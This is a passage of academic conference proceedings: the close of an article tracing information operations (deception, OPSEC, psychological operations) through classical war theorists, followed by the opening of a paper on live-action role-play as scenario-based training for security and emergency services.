considerable effort and understand<strong>in</strong>g of an adversary's way of th<strong>in</strong>k<strong>in</strong>g. Deception operations require a<br />
way to hide or cover real action and to deny critical <strong>in</strong>formation of both real and deceptive activities.<br />
Knowledge of deception plans must be carefully protected and distributed only to those crucial to the<br />
deception operation. Deception dur<strong>in</strong>g operations can directly contribute to the achievement of surprise<br />
and <strong>in</strong>directly to security and economy of effort. Deception operations must not affect the credibility of the<br />
forces or higher authorities. (MNIOE 2009)<br />
Counter Intelligence and Operations <strong>Security</strong> have and are be<strong>in</strong>g used to protect critical <strong>in</strong>formation from<br />
fall<strong>in</strong>g <strong>in</strong>to enemy hands. Operations <strong>Security</strong> (OPSEC) is an analytical process <strong>in</strong>tended to reduce risk<br />
to a military operation by adversary <strong>in</strong>telligence exploitation, and ma<strong>in</strong>ta<strong>in</strong> freedom of action by<br />
prevent<strong>in</strong>g an adversary’s foreknowledge of friendly dispositions, capabilities and <strong>in</strong>tentions.<br />
The OPSEC as a process identifies critical <strong>in</strong>formation and determ<strong>in</strong>es what <strong>in</strong>dicators hostile <strong>in</strong>telligence<br />
systems may obta<strong>in</strong> that could be used to derive critical <strong>in</strong>formation <strong>in</strong> time to be useful to adversaries.<br />
OPSEC then analyses the susceptibility of <strong>in</strong>formation to exploitation by an adversary’s <strong>in</strong>telligence<br />
(vulnerabilities) and operational capabilities, motivation, and <strong>in</strong>tentions designed to detect and exploit<br />
vulnerabilities (threat analysis). OPSEC also assesses the potential degree to which critical <strong>in</strong>formation is<br />
subject to loss through the exploitation of an adversary (risk analysis) and then selects and executes<br />
counter-measures that elim<strong>in</strong>ate or reduce the vulnerabilities to an acceptable level.<br />
127
Arto Hirvelä<br />
OPSEC is concerned with the achievement of secrecy and surprise <strong>in</strong> military operations and activities by<br />
protect<strong>in</strong>g capabilities and <strong>in</strong>tentions from hostile <strong>in</strong>telligence exploitation. The ultimate objective is to<br />
prevent an adversary from obta<strong>in</strong><strong>in</strong>g sufficient <strong>in</strong>formation <strong>in</strong> a timely manner to predict and degrade<br />
one’s operations or capabilities. Effective OPSEC contributes to Information Superiority.<br />
OPSEC concentrates on those activities that could <strong>in</strong>dicate the existence of an organisation, an<br />
impend<strong>in</strong>g operation or its details, or that could reveal <strong>in</strong>tentions, dispositions, capabilities and potential<br />
vulnerabilities. These activities are then protected us<strong>in</strong>g a range of counter-measures. (MNIOE 2009)<br />
2. War theorists’ views<br />
2.1 Sun Tzu<br />
Sun Tzu described the tenets of warfare over two thousand years ago. In his maxims he takes <strong>in</strong>to<br />
consideration many aspects that we now <strong>in</strong>clude <strong>in</strong> <strong>in</strong>formation operations. Subsequent theorists more or<br />
less follow his ideas.<br />
Sun Tzu sees INFO OPS as a means to achieve supreme excellence <strong>in</strong> warfare. His often quoted<br />
statement “to fight and conquer <strong>in</strong> all your battles is not supreme excellence; supreme excellence<br />
consists <strong>in</strong> break<strong>in</strong>g the enemy's resistance without fight<strong>in</strong>g” is a basic concept <strong>in</strong> INFO OPS. Sun Tzu’s<br />
advice is to defeat the enemy’s plans and not to attack the enemy's army on the field, where possible.<br />
(Sun Tzu 1998)<br />
Sun Tzu discusses psychological operations over chapters. He concludes that a whole army may be<br />
robbed of its spirit; a commander-<strong>in</strong>-chief may be robbed of his presence of m<strong>in</strong>d. (Sun Tzu 1998) Sun<br />
Tzu advice that when you surround an army, leave an outlet free and do not press a desperate foe too<br />
hard, is echoed <strong>in</strong> the writ<strong>in</strong>gs of Vegetius.<br />
Sun Tzu gives military deception a lot of credit by stat<strong>in</strong>g that all warfare is based on deception. (Sun Tzu<br />
1998) He bases the use of military force on always appear<strong>in</strong>g to be what you are not and where you are<br />
not supposed to be.<br />
Sun Tzu gives several examples of OPSEC for the purposes of military deception. He states that by<br />
discover<strong>in</strong>g the enemy's dispositions and rema<strong>in</strong><strong>in</strong>g <strong>in</strong>visible ourselves we can keep our forces<br />
concentrated, while the enemy's must be divided. He also cont<strong>in</strong>ues that the place where we <strong>in</strong>tend to<br />
fight must not be made known, for then the enemy will have to prepare aga<strong>in</strong>st a possible attack at<br />
several different po<strong>in</strong>ts, which makes him weaker. Sun Tzu concludes that <strong>in</strong> mak<strong>in</strong>g tactical dispositions,<br />
the highest th<strong>in</strong>g you can atta<strong>in</strong> is to conceal them, because then you will be safe from the pry<strong>in</strong>g of the<br />
subtlest spies and from the mach<strong>in</strong>ations of the wisest bra<strong>in</strong>s. (Sun Tzu 1998)<br />
2.2 Flavius Vegetius Renatus<br />
Flavius Vegetius Renatus acknowledged the essence of operations’ security, military deception and<br />
psychological operations and thus all the aspects of INFO OPS of his time. About deception he<br />
concluded that the Romans were always unequal to the Africans <strong>in</strong> deception and stratagem. (Vegetius<br />
2004) However, he stated that an able general never loses a favourable opportunity to surprise the<br />
enemy. The complexity of deception or the rigid organization of Romans did not prevent them from<br />
seek<strong>in</strong>g the advantage of surprise.<br />
Vegetius emphasized military tra<strong>in</strong><strong>in</strong>g and harden<strong>in</strong>g soldiers. He stated that few men are born brave.<br />
Many become so through tra<strong>in</strong><strong>in</strong>g and force of discipl<strong>in</strong>e. The courage of the soldier is heightened by the<br />
knowledge of his profession. (Vegetius 2004) A courageous soldier is less susceptible to <strong>in</strong>timidation by<br />
the enemy. Vegetius did acknowledge the value of psychological operations also by stat<strong>in</strong>g that to<br />
seduce the enemy’s soldiers from their allegiance and encourage them to surrender is of special service,<br />
for an adversary is more hurt by desertion than by slaughter. (Vegetius 2004) Desertion of a man could<br />
also lead to the desertion of many more and therefore also dim<strong>in</strong>ish the opponent’s view of his own<br />
leadership. Vegetius understood that giv<strong>in</strong>g the enemy the chance to leave combat would tempt him to<br />
desert or retreat. That is why he stated that generals unskilled <strong>in</strong> war th<strong>in</strong>k a victory <strong>in</strong>complete unless the<br />
enemy are so straightened <strong>in</strong> their ground or so entirely surrounded by numbers so as to have no<br />
possibility of escape. Vegetius clarified that when the enemy has free room to escape he th<strong>in</strong>ks of<br />
noth<strong>in</strong>g but how to save himself by flight, and as the confusion spreads, great numbers are cut to pieces.<br />
128
Arto Hirvelä<br />
On the other hand, weak and few <strong>in</strong> number, becomes a match for the enemy from this very reflection,<br />
that it has no resource but <strong>in</strong> despair just fight. (Vegetius 2004) In giv<strong>in</strong>g an enemy a way to surrender a<br />
skilled commander tempts them to do so.<br />
Vegetius understood the mean<strong>in</strong>g of operations security. His advice is that leaders should consult with<br />
many people on the proper measures to be taken, but communicate the plans they <strong>in</strong>tend to put <strong>in</strong><br />
execution to a select few of the most assured fidelity: or rather, trust no one but themselves. He also<br />
knows the mean<strong>in</strong>g of hav<strong>in</strong>g one’s operations security fail and recommends that when you f<strong>in</strong>d out the<br />
enemy has knowledge of your designs you must immediately alter your plan of operations. (Vegetius<br />
2004) Vegetius was — as <strong>in</strong> OPSEC now — concerned with the achievement of secrecy and surprise<br />
through protect<strong>in</strong>g capabilities and <strong>in</strong>tentions from hostile <strong>in</strong>telligence exploitation. The objective was<br />
then, as it is now, to prevent an adversary from obta<strong>in</strong><strong>in</strong>g sufficient <strong>in</strong>formation <strong>in</strong> a timely manner to<br />
predict and degrade our operations or capabilities.<br />
Although Vegetius did not use the modern terms of INFO OPS, he used many of the means of modern<br />
INFO OPS.<br />
2.3 Maurice de Saxe<br />
Marshal Maurice de Saxe stated that it is not the big armies that w<strong>in</strong> battles, it is the good ones. He also<br />
acknowledged the value of psychological effects by stat<strong>in</strong>g that hope encourages men to endure and<br />
attempt everyth<strong>in</strong>g; <strong>in</strong> depriv<strong>in</strong>g them of it, or <strong>in</strong> mak<strong>in</strong>g it too distant, you deprive them of their very soul.<br />
(de Saxe 1944) Even though de Saxe focused on economical <strong>in</strong>spiration, he repeated Vegetius’ advice<br />
about ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g good discipl<strong>in</strong>e.<br />
2.4 Napoleon Bonaparte<br />
Napoleon stated that <strong>in</strong> war you should never do what the enemy wishes you to do, for the reason that he<br />
desires it. (Chandler 2002) The tools for keep<strong>in</strong>g the opponent unaware of your true <strong>in</strong>tentions are<br />
OPSEC and military deception. Napoleon’s means of OPSEC and protection of plans were based mostly<br />
on centralized command, which he emphasized frequently. (Chandler 2002) Napoleon organized his<br />
command so that he was able to control subord<strong>in</strong>ates himself of through aides who had the authority to<br />
make changes to orders. This speeded up the decision cycle and enhanced operation security giv<strong>in</strong>g<br />
Napoleon an advantage aga<strong>in</strong>st his opponents. (Britt & Griess 2003) He also used deception to lure<br />
opponents <strong>in</strong>to a trap thus caus<strong>in</strong>g more casualties with fewer troops. (Barnet 1978)<br />
Napoleon Bonaparte stated that the moral is to the physical as three to one, acknowledg<strong>in</strong>g the value of<br />
psychological operations. (Liddell Hart 1991) About the courage Napoleon stated that it is the second<br />
quality required from the soldiers (Chandler 2002).<br />
He also stated that the secret of war lies <strong>in</strong> the communications and br<strong>in</strong>gs up its significance many<br />
times. (Chandler 2002) L<strong>in</strong>es of communication need to be protected and enemy l<strong>in</strong>es threatened. L<strong>in</strong>es<br />
of communication may also be used to deceive by lur<strong>in</strong>g the enemy to target false l<strong>in</strong>es.<br />
2.5 Carl von Clausewitz<br />
Carl von Clausewitz acknowledged the physical and psychological aspects of war. He repeatedly used<br />
concepts like physical and moral power, force and superiority. (Clausewitz 2008) Accord<strong>in</strong>g to him,<br />
physical power alone is not enough s<strong>in</strong>ce moral power is also essential to victory <strong>in</strong> war. Battles may be<br />
won without fight<strong>in</strong>g if the opponent perceives the other side to be much stronger and yields as a result.<br />
(Clausewitz 2008) The opponent’s understand<strong>in</strong>g of the situation may be manipulated with deception and<br />
psychological operations. Clausewitz emphasized that when destroy<strong>in</strong>g enemy forces, noth<strong>in</strong>g obligates<br />
us to limit this idea to physical forces; the moral element must also be taken <strong>in</strong>to account. He understood<br />
and described, <strong>in</strong> the same way that Vegetius did, that a great destructive act – a major victory – may be<br />
achieved through psychological effects, as the moral factor is the most fluid element of all, and therefore<br />
spreads most easily to affect everyth<strong>in</strong>g else. (Clausewitz 2008)<br />
Clausewitz writes about the destruction of military power, that is, it must be reduced to such a state as<br />
not to be able to prosecute war. (Clausewitz 2008) That might also mean that the enemy’s will to oppose<br />
is taken which may be done with psychological operations. Clausewitz also states that “even when the<br />
enemy is no longer able to prosecute the war and his land is conquered, still the war, that is, the hostile<br />
129
Arto Hirvelä<br />
feel<strong>in</strong>g and action of hostile agencies, cannot be considered as at an end as long as the will of the enemy<br />
is not subdued also”. (Clausewitz 2008) Therefore, accord<strong>in</strong>g to Clausewitz, it may be concluded that<br />
reduc<strong>in</strong>g the enemy’s military power to such a state that it is no longer able to prosecute war is not<br />
enough; the will of the oppos<strong>in</strong>g agencies must also be subdued.<br />
On the other hand, Clausewitz recognized that there are many ways to reach the aims of war, that the<br />
complete subjugation or the outright defeat of the opponent is not essential <strong>in</strong> every case. (Clausewitz<br />
1989) The opponent may be persuaded or compelled by the means of psychological operations to lose<br />
his will or moral force as Clausewitz described. Moral elements are, accord<strong>in</strong>g to Clausewitz, among the<br />
most important <strong>in</strong> war. (Clausewitz 1989)<br />
For Clausewitz surprise is an <strong>in</strong>dependent element that has the psychological effect of ga<strong>in</strong><strong>in</strong>g<br />
superiority. Surprise is produced by speed and secrecy. (Clausewitz 1989) Clausewitz did not consider<br />
military deception to be a very effective tool. He considered deception to have so little strategic value that<br />
it should only be used only if a ready-made opportunity presents itself. (Clausewitz 1989)<br />
2.6 Sir Basil Henry Liddell Hart<br />
All <strong>in</strong> all Liddell Hart understood the overall importance of non-lethal methods like INFO OPS and stated<br />
that it is more potent, as well as more economical, to disarm the enemy than to attempt to destroy him by<br />
hard fight<strong>in</strong>g. He cont<strong>in</strong>ues that a strategist should th<strong>in</strong>k <strong>in</strong> terms of paralyz<strong>in</strong>g, not of kill<strong>in</strong>g.<br />
He recognized the value of military deception <strong>in</strong> stat<strong>in</strong>g that the most effective <strong>in</strong>direct approach is one<br />
that lures or startles the opponent <strong>in</strong>to a false move. Deception can then directly contribute to the<br />
achievement of surprise and <strong>in</strong>directly to security and economy of effort as stated <strong>in</strong> the present<br />
description of the term (MNIOE 2009).<br />
Liddell Hart took the idea of psychological operations further with the advice that “even on the lower plane<br />
of warfare, a man killed is merely one man less, whereas a man unnerved is highly <strong>in</strong>fectious carrier of<br />
fear, capable of spread<strong>in</strong>g an epidemic of panic. On a higher plane of warfare, the impression made on<br />
the m<strong>in</strong>d of the oppos<strong>in</strong>g commander can nullify the whole fight<strong>in</strong>g power that his troops possess. And on<br />
a still higher plane, psychological pressure on the government of a country may suffice to cancel all<br />
resources at its command – so that the sword drops from a paralyzed hand” (Liddell Hart 1991) Liddell<br />
Hart thus reiterated what Vegetius had stated before, that it is better to affect m<strong>in</strong>d than body because<br />
psychological effects cause more damage to the opponent. With psychological effects the battle can be<br />
won, as Sun Tzu stated, without fight<strong>in</strong>g.<br />
Liddell Hart cont<strong>in</strong>ued to acknowledge the value of psychological operations and the protection of one’s<br />
own spirit and stated that to foster the people's will<strong>in</strong>g spirit is often as important as possess<strong>in</strong>g the more<br />
concrete forms of power (Liddell Hart 1991). He also wrote about <strong>in</strong> his action of strategy that <strong>in</strong> study<strong>in</strong>g<br />
the physical aspect we must never lose sight of the psychological, and only when both are comb<strong>in</strong>ed is<br />
the strategy truly an <strong>in</strong>direct approach, calculated to disturb the opponent’s balance (Liddell Hart 1991).<br />
Liddell Hart led his ideas from previous war leaders’ comments and dilemmas such as how to achieve the<br />
moral breakdown of the enemy before the war has started (Liddell Hart 1991). He concluded that <strong>in</strong> the<br />
end it is loss of hope rather than loss of life that decides the issues of war.<br />
3. Conclusion<br />
The importance of affect<strong>in</strong>g opponents’ m<strong>in</strong>ds has been acknowledged at least from the days of Sun Tzu.<br />
All of the theorists mentioned <strong>in</strong> this article discuss psychological operations. The means of affect<strong>in</strong>g the<br />
opponent’s m<strong>in</strong>d were of course more limited <strong>in</strong> those times <strong>in</strong> comparison to our current era of mass<br />
media where the media has brought new ways to affect. As with many developments, media can be just<br />
as much an asset as a h<strong>in</strong>drance <strong>in</strong> warfare.<br />
Military deception has been effectively used <strong>in</strong> warfare throughout history. In about three-quarters of<br />
military operations conducted dur<strong>in</strong>g the 18 th century, a surprise was achieved through deception. Of the<br />
theorists discussed here, Clausewitz is surpris<strong>in</strong>gly the one who did not consider military deception to be<br />
very effective. This might be because he was concerned with essence of war on a more strategic level as<br />
a mean to achieve political objectives. Most theorists do acknowledge the importance of deception and<br />
the keep<strong>in</strong>g of plans and manoeuvres secret from the enemy through OPSEC.<br />
130
Arto Hirvelä<br />
Revolution <strong>in</strong> military affairs has been discussed at length by military researchers. However, <strong>in</strong> light of the<br />
writ<strong>in</strong>gs of former war theorists, there seems to be more of a revolution <strong>in</strong> military technology rather than<br />
<strong>in</strong> warfare <strong>in</strong> general. The same basics from the time of Sun Tzu still apply and are emphasized <strong>in</strong> the<br />
writ<strong>in</strong>gs of subsequent theorists. However, the <strong>in</strong>formation environment <strong>in</strong> which military operations are<br />
be<strong>in</strong>g conducted has expanded greatly both <strong>in</strong> content and scope.<br />
Military operations have changed from the times of the war theorists dealt with <strong>in</strong> this article. The modern<br />
operations area usually <strong>in</strong>cludes not only our own and opponent’s forces but also neutral locals, nongovernmental<br />
organizations, mult<strong>in</strong>ational actors and global audiences through media. The <strong>in</strong>formation<br />
environment of military operations has expanded to cover entire world and any effects <strong>in</strong> it are very<br />
prompt. This has given new challenges to the analyz<strong>in</strong>g of <strong>in</strong>formation environment.<br />
Previous war theorists considered the target of INFO OPS to always be the opponent. As military<br />
operations become more comprehensive and <strong>in</strong>formation environment expands, targets also <strong>in</strong>clude<br />
neutral parties, allies and even one’s own people.<br />
War theorists perceived the value of methods that we now call <strong>in</strong>formation operations. Psychological<br />
operations, military deception and operations security are not new ways to conduct war, but there are<br />
new ways of us<strong>in</strong>g those elements <strong>in</strong> warfare and new collateral effects to consider.<br />
References<br />
Barnet, Correlli (1978) Bonaparte, George Allen & Unw<strong>in</strong> Ltd. pp 116–117.<br />
Britt, Albert Sidney & Griess, Thomas E. (2003) The wars of Napoleon, New York, Square One Publishers. Available:<br />
http://books.google.com (19.1.2011) pp 35–36.<br />
Chandler, David G. (2002) The Military Maxims of Napoleon, Translated by Sir George C. D’Aguilar, London,<br />
Greenhill Books. pp 59, 61, 69, 74, 77.<br />
Clausewitz (1989) On War, edited Michael Howard & Peter Paret, New Jersey, Pr<strong>in</strong>ceton University Press. pp 94,<br />
184, 198, 202<br />
Clausewitz (2008) On War, Translated by J.J. Graham, Digireads.com Publish<strong>in</strong>g. Available http://books.google.fi<br />
(19.1.2011) pp 37, 50, 96, 97, 157, 165, 384, 486, 510<br />
de Saxe, Maurice (1944) Reveries on the Art of War, Translated and edited by Thomas R. Phillips, Harrisburg,<br />
Pennsylvania, The Military Service Publish<strong>in</strong>g Company. p 27.<br />
Liddell Hart, Basil (1991) Strategy, second revised edition, New York, Pengu<strong>in</strong> Books. pp 5, 208, 212, 322, 327<br />
MNIOE Applied Concept (2009) The Military Information Operations Function with<strong>in</strong> a Comprehensive and Effects-<br />
Based Approach, F<strong>in</strong>al Draft Version 3.0, Bonn, MNE5. pp 18–22.<br />
Tzu, Sun (1998) Sodankäynn<strong>in</strong> taito, Art of War, Hels<strong>in</strong>ki, Tietosanoma Oy. pp 76, 86, 105, 107, 114, 116–117.<br />
Vegetius (2004) Vegetius Epitoma Rei Militaris, edited by M.D.Reeve, Oxford, Clarendon Press. pp 6, 108–109, 117,<br />
119<br />
131
Live-Action Role-Play as a Scenario-Based Tra<strong>in</strong><strong>in</strong>g Tool for<br />
<strong>Security</strong> and Emergency Services<br />
Sara Hjalmarsson<br />
Edith Cowan University, Joondalup, Western Australia<br />
shjalmar@our.ecu.edu.au<br />
Abstract: Appropriate tra<strong>in</strong><strong>in</strong>g and knowledge development is highly relevant to leaders and security professionals <strong>in</strong><br />
the fields of <strong>in</strong>formation warfare and counter-terrorism. Scenario-based tra<strong>in</strong><strong>in</strong>g methodology has a long history<br />
among military, law enforcement, emergency services and the private sector. It is recognised as an effective method<br />
for prepar<strong>in</strong>g leaders to make critical decisions under pressure. Over time, several models have been developed to<br />
illustrate its components and characteristics. Live-Action Role-Play (LARP) has been def<strong>in</strong>ed as a unique art form<br />
that, like scenario-based tra<strong>in</strong><strong>in</strong>g, can only be experienced as it is be<strong>in</strong>g created. It is an <strong>in</strong>ternational phenomenon<br />
with a diverse range of styles and characteristics. The current lead<strong>in</strong>g-edge developments occur <strong>in</strong> the Nordic<br />
countries (Sweden, Denmark, F<strong>in</strong>land and Norway). Although LARP is primarily used for enterta<strong>in</strong><strong>in</strong>g games, the art<br />
form bears significant resemblance to scenario-based tra<strong>in</strong><strong>in</strong>g and could be adapted for authentic task<strong>in</strong>g exercises.<br />
LARP contrasts with scenario-based tra<strong>in</strong><strong>in</strong>g <strong>in</strong> its use of persona with<strong>in</strong> a variable narrative eng<strong>in</strong>e and a context<br />
that <strong>in</strong>cludes many layers of complexity. Educational Live-Action Role-Play, known as Edu-LARP, has been<br />
<strong>in</strong>tegrated <strong>in</strong>to the Danish school system via Østerskov Efterskole, a board<strong>in</strong>g school for students aged 14-17 that<br />
follows the Danish national curriculum. LARP participants are already be<strong>in</strong>g used <strong>in</strong> tra<strong>in</strong><strong>in</strong>g exercises for emergency<br />
services due to their dynamic improvisation skills and cost-effectiveness. Experienced organisers and participants<br />
could contribute their ability to generate scenarios, work with uncerta<strong>in</strong>ty and ”th<strong>in</strong>k like the enemy, without becom<strong>in</strong>g<br />
the enemy.” to the design and execution of tra<strong>in</strong><strong>in</strong>g exercises. Additionally, they could contribute to scenario<br />
generation for scenarios <strong>in</strong>volv<strong>in</strong>g a high level of uncerta<strong>in</strong>ty, such as terrorist attacks and critical <strong>in</strong>frastructure<br />
<strong>in</strong>cidents. LARP events themselves could also be adapted to the tra<strong>in</strong><strong>in</strong>g needs and attributes of the audience,<br />
creat<strong>in</strong>g tra<strong>in</strong><strong>in</strong>g that fully engages the tra<strong>in</strong>ee and results <strong>in</strong> improved learn<strong>in</strong>g outcomes. As <strong>in</strong> the case of scenariobased<br />
tra<strong>in</strong><strong>in</strong>g, the use of LARP, LARP participants and LARP organisers must be implemented appropriately for<br />
them to be effective. This implies, for example, that participants and organisers must be experienced. It also implies<br />
that LARP used for tra<strong>in</strong><strong>in</strong>g purposes would demand an appropriate narrative eng<strong>in</strong>e, educational framework and<br />
level of complexity suitable to the audience. Although this paper identifies that there is significant potential <strong>in</strong> the<br />
LARP art form, it also recommends that further research be conducted to explore the relevance of different styles,<br />
aspects relat<strong>in</strong>g to effective implementation and possible other uses of the art form.<br />
Keywords authentic task<strong>in</strong>g, critical <strong>in</strong>frastructure protection, scenario generation, scenario-based tra<strong>in</strong><strong>in</strong>g, liveaction<br />
role-play, edu-LARP<br />
1. Introduction<br />
All good tra<strong>in</strong><strong>in</strong>g methods should <strong>in</strong>clude some form of simulation. LARP can add an<br />
element of uncerta<strong>in</strong>ty to it.<br />
Lunau 2010<br />
There exists a significant need to prepare leaders for decision-mak<strong>in</strong>g <strong>in</strong> a crisis situation (Moats,<br />
Chermack, and Dooley 2008). Appropriate tra<strong>in</strong><strong>in</strong>g and knowledge development is highly relevant to<br />
security professionals with<strong>in</strong> the fields of <strong>in</strong>formation warfare and counter-terrorism. This is particularly<br />
important to critical <strong>in</strong>frastructure <strong>in</strong>dustries where <strong>in</strong>cident consequences may impact significantly on the<br />
cont<strong>in</strong>uity of other <strong>in</strong>dustries. Games and role-play have been effectively used <strong>in</strong> the past for tra<strong>in</strong><strong>in</strong>g<br />
purposes and Live-Action Role-Play (LARP) offers another step <strong>in</strong> this cont<strong>in</strong>uum due to its <strong>in</strong>herent<br />
similarities to scenario-based tra<strong>in</strong><strong>in</strong>g (Bowman 2010, Blanchard & Thacker 2010).<br />
This paper builds on the work of Burns, Cannon-Bowers, Pruitt and Salas 1998, Burke & Salas 2002 and<br />
Cohn, Lyons and Schmorrow 2002, briefly outl<strong>in</strong><strong>in</strong>g their tra<strong>in</strong><strong>in</strong>g models. Based on these models, the<br />
processes of LARP and scenario-based tra<strong>in</strong><strong>in</strong>g have been compared and contrasted. This is an<br />
explorative paper and does not aim to propose a complete solution, but rather highlight an emerg<strong>in</strong>g<br />
discipl<strong>in</strong>e that may offer a valuable contribution to plann<strong>in</strong>g, simulation and tra<strong>in</strong><strong>in</strong>g related to <strong>in</strong>formation<br />
warfare. Further research will be necessary to establish how LARP can contribute, where it is appropriate<br />
and where it is not appropriate.<br />
For the sake of consistency, certa<strong>in</strong> conventions of def<strong>in</strong>ition and term<strong>in</strong>ology will be used with<strong>in</strong> this<br />
paper. Please note that the Nordic LARP conference will be referred to by its Norwegian name<br />
(Knutepunkt) for the purpose of this essay as the first conference was held <strong>in</strong> Norway. This paper shares<br />
132
Sara Hjalmarsson<br />
the approach of the Knutepunkt publications and the ELIN (Education-LARPer's International Network),<br />
which consider LARP as a dist<strong>in</strong>ct art form, rather than a form of theatre or wargame.<br />
2. Scenario-based tra<strong>in</strong><strong>in</strong>g<br />
Scenario-based tra<strong>in</strong><strong>in</strong>g differs from traditional tra<strong>in</strong><strong>in</strong>g <strong>in</strong> a several aspects. It focuses on the acquisition<br />
of complex tasks and was orig<strong>in</strong>ally developed to support team tra<strong>in</strong><strong>in</strong>g (Burns, et al, 1998, Oser, 1999).<br />
In this method of tra<strong>in</strong><strong>in</strong>g, the curriculum is organised with<strong>in</strong> a systematically developed scenario, rather<br />
than a conventional curriculum (Burns, et al. 1998, Oser 1999). Such tra<strong>in</strong><strong>in</strong>g has been used by military,<br />
police, emergency services and the private sector to prepare tra<strong>in</strong>ees for a variety of situations by<br />
simulat<strong>in</strong>g the real experience. The USA's Federal Bureau of Investigations has put new recruits through<br />
a 14- week long simulation of an <strong>in</strong>vestigation that <strong>in</strong>cluded a mock trial (Whitcomb, 1999; Van Hasselt,<br />
et al., 2008). The Mecklemburg EMS Agency, also <strong>in</strong> the USA, has a fully <strong>in</strong>tegrated simulation studio for<br />
tra<strong>in</strong><strong>in</strong>g emergency medical personnel (Bioterrorism week, 2007). Even the first army post-mobilisation<br />
tra<strong>in</strong><strong>in</strong>g for Iraq <strong>in</strong>cluded a scenario-based tra<strong>in</strong><strong>in</strong>g model called Theatre Immersion (Honoré and Zajac,<br />
2005).<br />
Effectively implemented scenario-based tra<strong>in</strong><strong>in</strong>g has a number of benefits. Its simulation-based<br />
methodology has proven more effective than problem-based tra<strong>in</strong><strong>in</strong>g for acquir<strong>in</strong>g critical assessment<br />
and management skills (Steadman et al. 2006). It can also provide tra<strong>in</strong>ees with authentic task<strong>in</strong>g<br />
exposure and the opportunity to evaluate multiple potential outcomes of a situation (Moats, et al., 2008;<br />
Oser, 1999; Burke & Salas, 2002). Additionally, it can serve to reduce tra<strong>in</strong><strong>in</strong>g costs without<br />
compromis<strong>in</strong>g tra<strong>in</strong><strong>in</strong>g quality (Burke et al, 2006). The effective use of scenario-based tra<strong>in</strong><strong>in</strong>g depends<br />
on appropriate implementation. Poorly implemented, scenario-based tra<strong>in</strong><strong>in</strong>g may result <strong>in</strong> the wrong<br />
th<strong>in</strong>g be<strong>in</strong>g learned, <strong>in</strong>adequate focus on the relevant skills or failure to relate tra<strong>in</strong><strong>in</strong>g to the real-world<br />
environment. Consequently, the scenarios and tra<strong>in</strong><strong>in</strong>g programs must be eng<strong>in</strong>eered to achieve the<br />
desired objectives and a number of models have been developed to illustrate this process. (Burns, et al,<br />
1998; Burke & Salas, 2002; Oser, 1999).<br />
Figure 1 illustrates the scenario-based tra<strong>in</strong><strong>in</strong>g cycle as described by Burns et al <strong>in</strong> 1998 and further<br />
adapted by Burke & Salas <strong>in</strong> 2002. The first step of this cycle <strong>in</strong>volves specify<strong>in</strong>g tra<strong>in</strong><strong>in</strong>g objectives and<br />
competencies (2 and 3), based on analytical approaches. An understand<strong>in</strong>g of the knowledge, skills and<br />
attitudes that are characteristic of effective performance (KSAs) is critical at this stage. The first step must<br />
then drive the second (4) where the scenario and it's tasks are crafted to allow the tra<strong>in</strong>ees to perform the<br />
targeted skills, so they may be effectively assessed. If the scenario is not developed explicitly to exercise<br />
objectives, valuable time will be lost on non-essential elements. In the third step (5) performance<br />
measures and standards for evaluat<strong>in</strong>g the tra<strong>in</strong>ees are developed. If this step is effectively executed, it<br />
becomes possible to both determ<strong>in</strong>e what was done well and why a particular behaviour occurred. This<br />
makes it possible to identify and address deficiencies <strong>in</strong> the tra<strong>in</strong>ee's knowledge. Thus, diagnostics can<br />
be created that are then used to assess and provide feedback to the tra<strong>in</strong>ee(s) (6). F<strong>in</strong>ally, the<br />
performance <strong>in</strong>formation must flow <strong>in</strong>to the next tra<strong>in</strong><strong>in</strong>g session, so it may build on, rather than duplicate,<br />
the tra<strong>in</strong>ee's knowledge (1).<br />
Figure 1: The components of scenario-based tra<strong>in</strong><strong>in</strong>g, adapted from Burns et al. (1998) and Burke &<br />
Salas (2002)<br />
133
Sara Hjalmarsson<br />
Cohn et al. (2002) offer a similar model that places the components of scenario-based tra<strong>in</strong><strong>in</strong>g <strong>in</strong>to three<br />
phases compris<strong>in</strong>g plann<strong>in</strong>g, execution and assessment. This model is illustrated <strong>in</strong> Figure 2 (V<strong>in</strong>cenzi,<br />
2008, pp. 207-208). In this model, the plann<strong>in</strong>g phase <strong>in</strong>volves the development of clear <strong>in</strong>struction<br />
objectives and identification of the tasks that the tra<strong>in</strong>ee is to undertake. These tasks are l<strong>in</strong>ked to the<br />
learn<strong>in</strong>g or tra<strong>in</strong><strong>in</strong>g objectives of the tra<strong>in</strong>ee and consequently, the competencies desired. Dur<strong>in</strong>g this<br />
phase, the focus of the scenario is documented based on the skill <strong>in</strong>ventory and the historical<br />
performance of the tra<strong>in</strong><strong>in</strong>g audience (V<strong>in</strong>cenzi, 2008, pp. 207-208).<br />
Figure 2: The SBT cycle, adapted from V<strong>in</strong>cenzi (2008), p.208<br />
3. Live-action role-play and educational live-action role-play<br />
Live-Action Role-Play (LARP) has been described as an art form that is unique due to its participatory<br />
nature. There is no audience and LARP is not usually recorded. Rather, it is experienced exclusively <strong>in</strong><br />
first-person. Instead of a script, guidel<strong>in</strong>es and constra<strong>in</strong>ts are used for direction.<br />
Similarly to scenario-based tra<strong>in</strong><strong>in</strong>g, LARP can only be experienced through direct participation <strong>in</strong> a live<br />
event such as an activity, exercise or production. There are also <strong>in</strong>ternational conferences held on the<br />
topic of LARP, of which Knutepunkt is regarded as the most <strong>in</strong>fluential. Although LARP is an <strong>in</strong>ternational<br />
phenonmenon, the current lead<strong>in</strong>g-edge developments have been identified as occurr<strong>in</strong>g <strong>in</strong> the Nordic<br />
countries (Interact<strong>in</strong>g Arts, 2010). The Nordic LARP tradition has also been documented by Stenros &<br />
Montola (2010).<br />
LARP offers a unique narrative medium that has been used for many different purposes. The events<br />
themselves are primarily used for enterta<strong>in</strong>ment, but have also found value with<strong>in</strong> television productions<br />
such as the Danish Barda. Another popular use is for games, such as White-Wolf's Vampire, the German<br />
Drachenfest event, the UK campaign Manticore and so on. LARP has also found its use with<strong>in</strong> traditional<br />
education through Østerskov Efterskole, a Danish board<strong>in</strong>g school for students aged 14-17, which follows<br />
the Danish national curriculum (Hyltoft, 2008). Additionally there exists an <strong>in</strong>ternational network of<br />
researchers and <strong>in</strong>dividuals that already use LARP with<strong>in</strong> the traditional school system, for adult<br />
education and <strong>in</strong> social work (ELIN 2010). This network is known as ELIN (Education-LARPers<br />
International Network).<br />
When used with<strong>in</strong> an educational context, LARP is called Educational Live-Action Role-Play (Edu-LARP)<br />
(ELIN 2010). Edu-LARP resembles scenario-based tra<strong>in</strong><strong>in</strong>g <strong>in</strong> the sense that the scenario becomes the<br />
